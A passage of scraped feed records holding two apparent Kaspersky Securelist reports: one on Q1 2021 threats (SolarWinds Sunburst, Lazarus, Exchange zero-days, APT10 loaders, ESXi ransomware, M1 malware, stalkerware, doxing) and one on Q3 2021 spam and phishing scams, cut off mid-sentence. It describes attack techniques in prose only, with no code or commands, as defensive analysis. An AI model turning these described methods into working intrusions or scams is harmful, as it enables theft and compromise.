"2021-05-31T11:03:47", "description": "\n\n## Targeted attacks\n\n### Putting the &#x27;A&#x27; into APT\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company&#x27;s Orion IT, a solution for monitoring and managing customers&#x27; IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nOne thing that sets this campaign apart from others, is the peculiar victim profiling and validation scheme. Out of the 18,000 Orion IT customers affected by the malware, it seems that only a handful were of interest to the attackers. This was a sophisticated attack that employed several methods to try to remain undetected for as long as possible. For example, before making the first internet connection to its C2s, the Sunburst malware lies dormant for up to two weeks, preventing easy detection of this behaviour in sandboxes. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation.\n\nFurther investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/01/08095035/Sunburst_backdoor_Kazuar_01.png>)\n\nThe shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\n### Lazarus targets the defence industry\n\nWe have observed numerous activities of the Lazarus group over many years, with the threat actor changing targets depending on its objectives. Over the last two years, we have tracked Lazarus&#x27;s use of ThreatNeedle, an advanced malware cluster of Manuscrypt (aka NukeSped), to target several industries. While investigating [attacks on the defense industry](<https://securelist.com/lazarus-threatneedle/100803/>) in mid-2020, we were able to observe the complete life-cycle of an attack, uncovering more technical details and links to the group&#x27;s other campaigns.\n\nLazarus made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. Once the victim opens an infected document and agrees to enable macros, the malware is dropped onto the system and proceeds to a multi-stage deployment procedure.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png>)\n\nAfter gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim&#x27;s environment. They overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the victim&#x27;s intranet to their remote server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png>)[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png>)\n\nWe have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to several other clusters belonging to the Lazarus group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png>)\n\n### MS Exchange zero-day vulnerabilities exploited in the wild\n\nOn March 2, Microsoft released [out-of-band patches for four zero-day vulnerabilities in Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) that are being actively exploited in the wild (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065). The vulnerabilities allow an attacker to gain access to an Exchange server, create a web shell for remote server access and steal data from the victim&#x27;s network.\n\nMicrosoft attributed the attacks to a threat actor called Hafnium, although other researchers have reported that there are also [other groups exploiting the vulnerabilities to launch attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>).\n\nOur [threat intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) indicates that companies across the globe have been targeted in attacks that exploit these vulnerabilities \u2013 with the greatest focus on Europe and the US.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>)Kaspersky products protect against this threat with [behavior-based detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [exploit prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. We also detect and block the backdoors used in the exploitation of these vulnerabilities. Our EDR ([Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>)) solution helps to identify attacks in the early stages by marking suspicious actions with special IoA (Indicators of Attack) tags and by creating corresponding alerts.\n\nOur recommendations for staying safe from attacks using these vulnerabilities can be found [here](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>).\n\n### Ecipekac: sophisticated multi-layered loader discovered in A41APT campaign\n\nA41APT is a long-running campaign, active from March 2019 to the end of December 2020, that has targeted multiple industries, including Japanese manufacturing and its overseas bases. We believe, with high confidence, that the threat actor behind this campaign is APT10.\n\nOne particular piece of malware from this campaign is called Ecipekac (aka DESLoader, SigLoader, and HEAVYHAND). It is a very sophisticated multi-layer loader module used to deliver payloads such as SodaMaster, P8RAT, and FYAnti which in turn loads QuasarRAT.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25134233/APT10_and_the_A41_APT_campaign_14.png>)The operations and implants of the campaign are remarkably stealthy, making it difficult to track the threat actor&#x27;s activities. The threat actor behind the campaign implements several measures to conceal itself and make it more difficult to analyze. Most of the malware families used in the campaign are fileless malware and have not been seen before.\n\nWe believe that the most significant aspect of the Ecipekac malware is that the encrypted shellcodes are inserted into digitally signed DLLs without affecting the validity of the digital signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25132856/APT10_and_the_A41_APT_campaign_05.png>)\n\nWhen this technique is used, some security solutions cannot detect these implants. Judging from the main features of the P8RAT and SodaMaster backdoors, we believe these modules are downloaders responsible for downloading further malware which we have so far been unable to obtain.\n\nYou can find out more about the campaign [here](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Other malware\n\n### Fake ad blocker, with miner included\n\nSome time ago, we discovered a number of fake applications being used to deliver a Monero crypto-currency miner to target computers. The fake programs are distributed through malicious websites that may be listed in the victim&#x27;s search results. We believe this is a continuation of [a campaign last summer, reported by Avast](<https://blog.avast.com/fake-malwarebytes-installation-files-distributing-coinminer>), in which the malware masqueraded as the Malwarebytes antivirus installer. In [the latest campaign](<https://securelist.com/ad-blocker-with-miner-included/101105/>), we observed the malware impersonating several applications: the ad blockers AdShield and Netshield, as well as the OpenDNS service.\n\nOnce the victim has started the program, it changes the DNS settings on the device so that all domains are resolved through the attackers&#x27; servers: this prevents the victim from accessing certain antivirus sites. The malware then updates itself: the update also downloads and runs a modified Transmission torrent client, which sends the ID of the targeted computer, along with installation details, to the C2 server. It then downloads and installs the miner.\n\nData from Kaspersky Security Network showed that, from February 2021 until the time we published our report, there were attempts to install fake applications on the devices of more than 7,000 people. At the peak of the current campaign, more than 2,500 people were attacked each day, with most victims located in Russia and CIS countries. \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/05122816/01-en-ru-fake-adshield-miner-diagram.png>)\n\n### Ransomware encrypting virtual hard disks\n\nRansomware gangs are exploiting vulnerabilities in VMware ESXi to target virtual hard disks and encrypt the data stored on them. The ESXi hypervisor lets multiple virtual machines store information on a single server using the SLP (Service Layer Protocol).\n\nThe first vulnerability ([CVE-2019-5544](<https://www.vmware.com/security/advisories/VMSA-2019-0022.html>)) can be used to carry out [heap overflow attacks](<https://encyclopedia.kaspersky.com/glossary/heap-overflow-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). The second ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) is a [Use-After-Free (UAF) vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) related to the incorrect use of dynamic memory during program operation. Once attackers have been able to gain an initial foothold in the target network, they can use the vulnerabilities to generate malicious SLP requests and compromise data storage.\n\nThe vulnerabilities are being exploited by [RansomExx](<https://www.kaspersky.com/blog/ransomware-in-virtual-environment/39150/>). The [Darkside](<https://www.infosecurity-magazine.com/news/darkside-20-ransomware-fastest/>) group is reportedly using the same approach; and the attackers behind the [BabuLocker Trojan](<https://twitter.com/campuscodi/status/1354237766285012992>) have also hinted that they are able to encrypt ESXi.\n\n### macOS developments\n\nTowards the end of last year, Apple unveiled machines powered by its own M1 chip, designed to replace Intel&#x27;s processors in its computers. The Apple M1, a direct relative of the processors used in the iPhone and iPad, will ultimately allow Apple to unify its software under a single architecture.\n\nJust a few months after the release of the first Apple M1 computers, malware writers had already recompiled their code to adapt it to the new architecture.\n\nThese include the developers of XCSSET, malware [first discovered last year](<https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html>), which targets Mac developers by injecting a malicious payload into Xcode IDE projects on the victim&#x27;s Mac. This payload is subsequently executed during the building of project files in Xcode. XCSSET modules are able to read and dump Safari cookies, inject malicious JavaScript code into various websites, steal files and information from applications such as Notes, WeChat, Skype, Telegram and others, and encrypt files. The samples we have observed include some compiled specifically for the Apple Silicon chips.\n\nSilver Sparrow is [another new threat](<https://redcanary.com/blog/clipping-silver-sparrows-wings/>) that targets the M1 chip. This malware introduces a new way for malware writers to abuse the default packaging functionality: instead of placing a malicious payload inside pre-install or post-install scripts, they hid one in the Distribution XML file. This payload uses JavaScript API to run bash commands in order to download a JSON configuration file. The sample extracts a URL from the &quot;downloadURL&quot; field for the next download. An appropriate Launch Agent is also created for persistent execution of the malicious sample. The JavaScript payload can be executed regardless of chip architecture, but analysis of the package file makes it clear that it supports both Intel and M1 chips.\n\nMost malicious objects detected for the macOS platform are adware. The developers of these programs are also updating their code to include support for the M1 chip, including the Pirrit and Bnodlero families.\n\nYou can find technical details, along with our FAQ on M1 threats, [here](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\nCybercriminals don&#x27;t just add support for new platforms: sometimes they use new programming languages to develop their &#x27;products&#x27;. Recently, macOS adware developers have been paying more attention to new languages, apparently in the hope that such code will be more opaque to virus analysts who have little or no experience with the newer languages. We have already seen quite a few samples written in Go, and recently cybercriminals have turned their attention to Rust as well. You can read our analysis of a new adware program called Convuster [here](<https://securelist.com/convuster-macos-adware-in-rust/101258/>).\n\n### Secondhand news\n\nThere&#x27;s a strong market in secondhand computing devices. Some of our researchers recently looked at [the security implications of buying and selling secondhand devices](<https://www.kaspersky.com/blog/data-on-used-devices/38610/>): their aim was to see what traces are left behind on laptops and other storage data when people sell them.\n\nThe overwhelming majority of the devices we investigated contained at least some traces of data \u2013 mostly personal but some corporate. Researchers were able to access data on more than 16% of the devices outright. A further 74% contained data that could be recovered using [file-carving](<https://en.wikipedia.org/wiki/File_carving>) methods. Only 11% of devices had been wiped properly.\n\nThe data recovered ranged from the harmless to revealing and even dangerous: calendar entries, meeting notes, access data for corporate resources, internal business documents, personal photos, medical information, tax documents and more. Some of the data could be used directly \u2013 for example, contact information, tax documents and medical records (or access to them through saved passwords). Other data could lead to indirect damage if exploited by cybercriminals.\n\nAside from the data that could be exposed, there&#x27;s also a risk that malware left on a device could infect the new owner. We found malware on 17% of the devices we looked at.\n\nSellers need to consider what traces they might leave behind when they sell a device; and buyers need to think about the security of any secondhand device they buy.\n\nThe UK National Cyber Security Centre (NCSC) provides good [practical advice for buyers and sellers](<https://www.ncsc.gov.uk/guidance/buying-selling-second-hand-devices>).\n\n### Stalkerware during the pandemic\n\n[Stalkerware](<https://csr.kaspersky.com/en/antistalking/eng.html>) is commercially available software used to spy on another person via their device, without that person&#x27;s knowledge or consent. Stalkerware is the digital tip of a very real-world iceberg. In a 2017 report, the European Institute for Gender Equality indicates that seven out of 10 women affected by online stalking have experienced physical violence at the hands of the perpetrator. The [Coalition Against Stalkerware](<https://stopstalkerware.org/>) defines stalkerware as software which &quot;may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence&quot;.\n\nThe number of people affected by stalkerware has been growing in recent years. We saw a fall in numbers in 2020, the drop-off coinciding with the worldwide lockdowns that came in the wake of the COVID-19 pandemic. This is hardly surprising: since stalking is typically carried out by someone the target lives with, if both abuser and target are housebound, there is less need to use technology to track someone&#x27;s activities. Notwithstanding the _relative_ decline, 53,870 is a big number. Moreover, these are numbers of Kaspersky customers: no doubt the real figure is considerably higher.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png>)The most commonly detected stalkerware sample in 2020 was Monitor.AndroidOS.Nidb.a. This app is re-sold under other names, so it is prominent in the market \u2013 iSpyoo, TheTruthSpy and Copy9 apps are all part of this family. Another popular application is Cerberus, which is sold as anti-theft smartphone protection and hides itself to avoid notice. Like genuine phone-finding apps, Cerberus has access to geo-location, can take photos and screenshots and record sound. Other high-ranking stalking apps include Track My Phone (which we detect as Agent.af), MobileTracker and Anlost.\n\n**Top 10 most detected stalkerware samples globally**\n\n| Samples | Affected users \n---|---|--- \n1 | Monitor.AndroidOS.Nidb.a | 8147 \n2 | Monitor.AndroidOS.Cerberus.a | 5429 \n3 | Monitor.AndroidOS.Agent.af | 2727 \n4 | Monitor.AndroidOS.Anlost.a | 2234 \n5 | Monitor.AndroidOS.MobileTracker.c | 2161 \n6 | Monitor.AndroidOS.PhoneSpy.b | 1774 \n7 | Monitor.AndroidOS.Agent.hb | 1463 \n8 | Monitor.AndroidOS.Cerberus.b | 1310 \n9 | Monitor.AndroidOS.Reptilic.a | 1302 \n10 | Monitor.AndroidOS.SecretCam.a | 1124 \n \nThe greatest number of stalkerware detections occurred in Russia, Brazil and the US.\n\n**Top 10 most affected countries by stalkerware \u2013 globally**\n\n| Country | Affected users \n---|---|--- \n1 | Russian Federation | 12389 \n2 | Brazil | 6523 \n3 | United States of America | 4745 \n4 | India | 4627 \n5 | Mexico | 1570 \n6 | Germany | 1547 \n7 | Iran | 1345 \n8 | Italy | 1144 \n9 | United Kingdom | 1009 \n10 | Saudi Arabia | 968 \n \nYou can read our full report on the subject [here](<https://securelist.com/the-state-of-stalkerware-in-2020/100875/>).\n\nStalkerware operates stealthily, so it&#x27;s difficult for anyone targeted with such programs to see that it&#x27;s installed on their device \u2013 they hide the app&#x27;s icon and remove other traces of their presence.\n\nKaspersky is actively working to end the use of stalkerware, not just by detecting it but by working with partners. In 2019, Kaspersky and nine other founding members created the [Coalition Against Stalkerware](<https://stopstalkerware.org/>). Last year, we created [TinyCheck](<https://github.com/KasperskyLab/TinyCheck>), a free tool to detect stalkerware on mobile devices \u2013 specifically for service organizations working with people facing domestic violence. We are one of five partners in an EU-wide project aimed at tackling gender-based cyber-violence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.\n\n### Doxing in the corporate sector\n\nWhen most people think of [doxing](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), they tend to think it applies only to celebrities and other high-profile people. However, confidential corporate information is no less sensitive; and the financial and reputational impact resulting from the disclosure of such data means that any organization could become a victim of doxing. This is clear, for example, from the fact that several ransomware gangs now threaten to leak stolen corporate data to increase the likelihood that their victims will pay up.\n\nCybercriminals use a variety of methods to gather confidential corporate information.\n\nOne of the easiest approaches is to use open-source intelligence (OSINT) \u2013 that is, gathering data from publicly accessible sources. The internet provides a lot of helpful information to would-be attackers, including the names and positions of employees, including those who occupy key positions in the company: for example, the CEO, HR director and chief financial officer.\n\nInformation harvested from the online personal profiles of employees can be used to set up [BEC](<https://encyclopedia.kaspersky.com/glossary/bec/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (Business Email Compromise) attacks, in which an attacker initiates email correspondence with a member of staff by posing as a different employee (including their superior) or as a representative of a partner company. The attacker does this to gain the trust of the target before persuading them to perform certain actions, such as sending confidential data or transferring funds to an account controlled by the attacker.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26124957/Corporate_doxing_01.png>)\n\nBEC attacks can also be used to collect further information about the company, or to gain access to valuable corporate data, or access to company resources \u2013 for example, credentials allowing access to cloud-based systems. \nThere are various technical tricks that cybercriminals use to obtain information relevant to their particular goals, including sending [email messages containing a tracking pixel](<https://www.kaspersky.com/blog/tracking-pixel-bec/36976/>) \u2013 often disguised as a &quot;test&quot; message.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125040/Corporate_doxing_02.png>)\n\nThis enables attackers to obtain data such as the time the email was opened, the version of the recipient&#x27;s mail client and the IP address. This data lets the attackers build a profile on a specific person who they can then impersonate in subsequent attacks.\n\nPhishing continues to be an effective way for attackers to gather corporate data. For example, they may send an employee a message that mimics a notification from a business platform such as SharePoint, which contains a link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125148/Corporate_doxing_04.jpg>)\n\nIf the employee clicks the link, they are redirected to a spoofed website containing a fraudulent form for entering their corporate account credentials \u2013 data which is captured by the attackers.\n\nSometimes cybercriminals resort to phone phishing \u2013 either by calling an employee directly and trying to &quot;phish&quot; corporate information, or sending a message and asking them to call the number given in the message. One way to trick employees is to pose as IT support staff \u2013 this method was used in the [Twitter hack](<https://www.dfs.ny.gov/Twitter_Report>) in July 2020.\n\n> By obtaining employee credentials, they were able to target specific employees who had access to our account support tools. They then targeted 130 Twitter accounts - Tweeting from 45, accessing the DM inbox of 36, and downloading the Twitter Data of 7.\n> \n> -- Twitter Support (@TwitterSupport) [July 31, 2020](<https://twitter.com/TwitterSupport/status/1289000208701878272?ref_src=twsrc%5Etfw>)\n\nAttackers may not confine themselves to gathering publicly available data, but may also hack an employee&#x27;s account. This could be used to gain a foothold in the company, from which they can extend their activities, or to circulate false information that could damage the company&#x27;s reputation and result in financial loss. There has even been a case where cybercriminals have obtained audio and video content of the CEO of an international company and [used deepfake technology to imitate the CEO&#x27;s voice](<https://www.kaspersky.com/blog/machine-learning-fake-voice/28870/>), using it to persuade the management team of one of the company&#x27;s branches to transfer money to the scammers.\n\nYou can read our full report on doxing, including tips on how to protect yourself, [here](<https://securelist.com/corporate-doxing/101513/>).", "cvss3": {}, "published": "2021-05-31T10:00:37", "type": "securelist", "title": "IT threat evolution Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-5544", "CVE-2020-3992", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:37", "id": "SECURELIST:A823F31C04C74DD103337324E6D218C9", "href": "https://securelist.com/it-threat-evolution-q1-2021/102382/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were &quot;official&quot;, despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the &quot;bonus&quot; evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n&quot;Nigerian prince&quot; scammers also had a close eye on Q3&#x27;s sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of &quot;holiday deals&quot; supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children&#x27;s World, a major chain of kids&#x27; stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the &quot;promotion&quot; to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the &quot;lucky ones&quot; had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the &quot;winner&quot; was promised as a prize a QR code that could supposedly be used to make purchases in the company&#x27;s stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a &quot;commission&quot; before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly &quot;reads cookies from the victim&#x27;s device to estimate their market value.&quot; The &quot;valuation&quot; most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers&#x27; possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded on such platform. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to &quot;pay for legal services relating to form registration&quot;. The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which they removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim&#x27;s account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began &quot;selling&quot; their own. We also encountered rogue sites offering negative PCR test certificates. The &quot;customer&quot; was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the &quot;Nigerian prince&quot; scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, &quot;Nigerian prince&quot; scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina&#x27;s BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim&#x27;s system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 